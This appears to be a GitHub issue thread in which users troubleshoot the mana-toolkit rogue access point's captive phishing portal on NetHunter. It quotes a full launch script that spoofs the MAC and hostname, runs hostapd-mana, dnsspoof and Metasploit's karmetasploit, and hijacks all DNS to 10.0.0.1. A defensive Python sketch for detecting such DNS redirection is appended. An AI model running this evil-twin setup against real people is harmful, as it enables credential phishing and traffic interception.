Open HeavensWing opened 7 years ago
Same with me, can you help us with this? I am running it on Nethunter too. I can connect to the phone but can't ping the captive portal 10.0.0.1. Thanks in advance.
Hey, I am not the dev who made this, but from some debugging I noticed there is an issue with the DNS redirection. At least you managed to get the IP leases fixed. I am assuming you are running /usr/share/mana-toolkit/run-mana/start-noupstream.sh.
By default it is supposed to use DNSMasq and Metasploit's FakeDNS module for the redirection. It tells msfconsole to run this file: /etc/mana-toolkit/karmetasploit.rc
It already has the proper pointers, basically saying "all traffic from DNS requests goes to 10.0.0.1", or "phishing page".
The pointer is here: dnsspoof -i $phy -f /etc/mana-toolkit/dnsspoof.conf inside of the file: /usr/share/mana-toolkit/run-mana/start-noupstream.sh
The file is located here: /etc/mana-toolkit/dnsspoof.conf
It does the same thing, again, in Metasploit with the auxiliary/server/fakedns module. But in the latest version of the karmetasploit resource script, it appears it got commented out. https://github.com/sensepost/mana/commit/8c0286c8e69219a53e2b1351d6ce73957e506e5c
I've been trying other methods, like attempting to use DNSChef instead. But then it locks out DNSMasq because it's fighting for the same port and host.
However, the with-uplink attack works perfectly, but using the no-uplink attack with a captive phishing portal seems to have DNS issues. I tried running "host", "nslookup", and "dig" and it keeps resolving to the real legitimate IP address.
I'm running Nethunter on an S7E with TL-722n.
When running start-noupstream.sh everything seems fine, the AP comes up and everything as it should. For a short period of time, I can connect with my laptop and hit an http site and be redirected to my captive portal. This all has to be done within about 5-10 seconds. After that, the AP shows "No internet connectivity" on the laptop and I can't reach the site even by using the 10.0.0.1 address. I can't ping the gateway either.
I cleared all the iptables rules, thinking that an incoming connection was being blocked, yet it didn't help.
I set up the same exact test in a VM on my laptop and everything works fine, so I don't know what's stopping my phone from working.
What is also strange: if I connect to the AP via my phone (the same device I'm running the test on), I can reach the page using the address 10.0.0.1.
/usr/share/mana-toolkit/run-mana/start-noupstream.sh ::::::::::::::
#!/bin/bash

phy=wlan1
conf=/etc/mana-toolkit/hostapd-mana.conf
hostapd=/usr/lib/mana-toolkit/hostapd

hostname WRT54G
echo hostname WRT54G
sleep 2

service network-manager stop
rfkill unblock wlan

ifconfig $phy down
macchanger -r $phy
ifconfig $phy up

sed -i "s/^interface=.*$/interface=$phy/" $conf
sed -i "s/^set INTERFACE .*$/set INTERFACE $phy/" /etc/mana-toolkit/karmetasploit.rc
$hostapd $conf&
sleep 5
ifconfig $phy 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

dnsspoof -i $phy -f /etc/mana-toolkit/dnsspoof.conf&
dnsmasq -C /etc/mana-toolkit/dnsmasq-dhcpd.conf $phy
dnsmasq -C /etc/mana-toolkit/dnsmasq-dhcpd.conf -i $phy

dnsmasq -C /etc/mana-toolkit/dnsmasq-dhcpd.conf $phy
dnsspoof -i $phy -f /etc/mana-toolkit/dnsspoof.conf&
service apache2 start
stunnel4 /etc/mana-toolkit/stunnel.conf
tinyproxy -c /etc/mana-toolkit/tinyproxy.conf&
msfconsole -r /etc/mana-toolkit/karmetasploit.rc&

echo '1' > /proc/sys/net/ipv4/ip_forward
iptables --policy INPUT ACCEPT
iptables --policy FORWARD ACCEPT
iptables --policy OUTPUT ACCEPT
iptables -F
iptables -t nat -F
iptables -t nat -A PREROUTING -i $phy -p udp --dport 53 -j DNAT --to 10.0.0.1

echo "Hit enter to kill me"
read
pkill hostapd
pkill dnsmasq
pkill dnsspoof
pkill tinyproxy
pkill stunnel4
pkill ruby
service apache2 stop
iptables -t nat -F
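Added example, not part of the thread or of mana-toolkit: seen from a client, the "all DNS requests go to 10.0.0.1" redirection described above has a recognisable shape, and this Python sketch scores a set of DNS answers for it. The function names, the canary hostname and the sample answers are constructed for illustration; a legitimate captive portal produces the same pattern, so "suspicious" means "do not trust this resolver yet".

```python
import ipaddress
import socket
from collections import Counter


def collect(names):
    """Resolve each name with the system resolver; an empty list means no answer."""
    out = {}
    for name in names:
        try:
            out[name] = socket.gethostbyname_ex(name)[2]
        except socket.gaierror:
            out[name] = []
    return out


def assess_dns_answers(answers, canaries=()):
    """answers: {name: [IPv4 strings]}. canaries: names known not to exist.
    Returns (verdict, findings)."""
    findings = []
    # 1. A resolver that answers for a nonexistent name is rewriting responses.
    hit = sorted(n for n in canaries if answers.get(n))
    if hit:
        findings.append("nonexistent names resolved: " + ", ".join(hit))
    # 2. Unrelated real names collapsing onto one address.
    known = {n: set(a) for n, a in answers.items() if n not in canaries and a}
    counts = Counter(ip for ips in known.values() for ip in ips)
    if len(known) >= 3:
        ip, seen = counts.most_common(1)[0]
        if seen == len(known):
            findings.append(f"all {seen} unrelated names resolve to {ip}")
    # 3. Public names answered with private/reserved addresses (e.g. the AP gateway).
    private = sorted(ip for ip in counts if ipaddress.ip_address(ip).is_private)
    if private:
        findings.append("public names answered with private addresses: " + ", ".join(private))
    return ("suspicious" if findings else "ok"), findings


# Constructed sample data, not captured from a real network.
CANARY = "zz-canary-7f3a91.example.com"
SPOOFED = {"example.com": ["10.0.0.1"], "example.org": ["10.0.0.1"],
           "example.net": ["10.0.0.1"], CANARY: ["10.0.0.1"]}
NORMAL = {"example.com": ["93.184.216.34"], "example.org": ["142.250.72.14"],
          "example.net": ["151.101.1.69"], CANARY: []}

if __name__ == "__main__":
    for label, sample in (("spoofed", SPOOFED), ("normal", NORMAL)):
        print(label, assess_dns_answers(sample, canaries=[CANARY]))
```

On a live network, pass the output of `collect()` for a few unrelated domains plus a freshly generated random hostname as the canary.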